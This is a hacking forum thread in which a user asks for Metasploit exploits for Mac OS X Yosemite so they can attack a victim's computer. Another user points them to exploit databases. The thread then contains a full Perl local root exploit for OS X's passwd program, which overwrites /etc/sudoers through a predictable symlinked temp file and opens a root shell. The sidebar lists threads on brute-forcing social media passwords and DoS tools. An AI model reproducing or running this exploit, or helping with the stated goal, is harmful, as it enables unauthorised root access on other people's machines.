Well, I started to use metasploit and I tried to search some exploits for Mac OS X Yosemite, but there were nothing. Is the OS too safe to get hacked with metasploit or what's the problem? I really want to solve this problem, cause my victims Computer is running on OSX. Any Ideas?
Forum Thread: Any Exploits for Mac OSX?
- Hot
- Active
-
Forum Thread:
Chinese Electricity Effluence
0
Replies
3 hrs ago -
Forum Thread:
WooCommerce Quantity Range Pricing
0
Replies
5 hrs ago -
Forum Thread:
How to Hack My College Website ?
21
Replies
6 hrs ago -
Forum Thread:
How to Configure Fluxion,Airgeddon,Lazy Script Etc to Use wlan0 as Monitor Mode
0
Replies
8 hrs ago -
Forum Thread:
Benefits of {Cannwell Cbd Oil Canada} & Read Reviews Before Buying.
0
Replies
17 hrs ago -
Forum Thread:
Gain Access to (Data on) Locked Android 9 Phone
0
Replies
19 hrs ago -
Forum Thread:
How to Hack an Android Device with Only a Ip Adress
41
Replies
20 hrs ago -
Forum Thread:
How to Change a Mixing Consoles Audio File?
2
Replies
3 days ago -
HOW to:
TAKE DOWN the SITES with HULK DOS
0
Replies
3 days ago -
Forum Thread:
GMail Brute Force Dictionary Attack Script
30
Replies
3 days ago -
Forum Thread:
Metasploit reverse_tcp Handler Problem
39
Replies
3 days ago -
Forum Thread:
Bypassing DeepFreeze Without Reseting the Password?
4
Replies
4 days ago -
Forum Thread:
How Does Someone Attack Account by Just Having Their @Username ? The Application Is Kik!
5
Replies
4 days ago -
Metasploit Error:
Handler Failed to Bind
38
Replies
4 days ago -
Forum Thread:
How to Convert .Bat (Payload) To .Exe in Linux?
9
Replies
6 days ago -
Forum Thread:
Hack Instagram Account Using BruteForce
193
Replies
1 wk ago -
Forum Thread:
Monitor Mode Kills WiFi Kali Linux
13
Replies
1 wk ago -
How to:
Crack Instagram Passwords Using Instainsane
29
Replies
1 wk ago -
Forum Thread:
How to Crack Window Password with Kali Live Usb
18
Replies
1 wk ago -
Forum Thread:
Hacking Facebook,Twitter,Instagram Account Passwords with BruteForce
154
Replies
1 wk ago
-
How To:
Discover Hidden Subdomains on Any Website with Subfinder
-
Android for Hackers:
How to Turn an Android Phone into a Hacking Device Without Root
-
How To:
Scan for Vulnerabilities on Any Website Using Nikto
-
How To:
Top 10 Things to Do After Installing Kali Linux
-
How To:
Gain SSH Access to Servers by Brute-Forcing Credentials
-
How To:
Find Identifying Information from a Phone Number Using OSINT Tools
-
How To:
Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019
-
How To:
Hack Android Using Kali (Remotely)
-
How to Hack Wi-Fi:
Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
How to Hack Wi-Fi:
Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
How To:
4 Ways to Crack a Facebook Password & How to Protect Yourself from Them
-
How To:
Crack Shadow Hashes After Getting Root on a Linux System
-
How To:
Protect Yourself Online While Upping Your Internet Productivity with This VPN
-
How to Hack Wi-Fi:
Stealing Wi-Fi Passwords with an Evil Twin Attack
-
Steganography:
How to Hide Secret Data Inside an Image or Audio File in Seconds
-
How To:
Scrape Target Email Addresses with TheHarvester
-
How To:
Run Kali Linux as a Windows Subsystem
-
How To:
Automate Wi-Fi Hacking with Wifite2
-
How To:
Crack Password-Protected Microsoft Office Files, Including Word Docs & Excel Spreadsheets
-
Hack Like a Pro:
How to Crack Online Web Form Passwords with THC-Hydra & Burp Suite
4 Responses
There are numerous exploits for OS X in Metasploit. Look again. In addition, check exploitdb for exploits or securityfocus.com. There are numerous exploits for OS X. It is far from safe!
Yeah, thanks. But with which kind of program do I use script like this:
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/perl
#
# /usr/bin/passwdOSX: local root exploit.
#
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)
use POSIX;
$fakepasswd="/tmp/xpasswd.$$";
$passwdpid=($$ + 1);
$passwdtempfile="/tmp/.pwtmp.$passwdpid";
$sudoers="/etc/sudoers";
sub pexit{print("! @.\n");exit(1);}
print("* /usr/bin/passwdOSX: local root exploit.\n");
print("* by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fakepasswd);
print("* making fake password file. ($fakepasswd)\n");
open(FP,">$fakepasswd")||pexit("couldn't open/write to $fakepasswd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("* sym-linking $sudoers -> $passwdtempfile.\n");
symlink($sudoers,$passwdtempfile)||pexit("couldn't link files.");
print("* running /usr/bin/passwd on $fakepasswd.\n");
print("* (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fakepasswd \"ALL ALL=(ALL) ALL #\"");
print("\n* running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);
That is a Perl script.
Security Focus is what I use. Sometimes they have the exploits already there.
Share Your Thoughts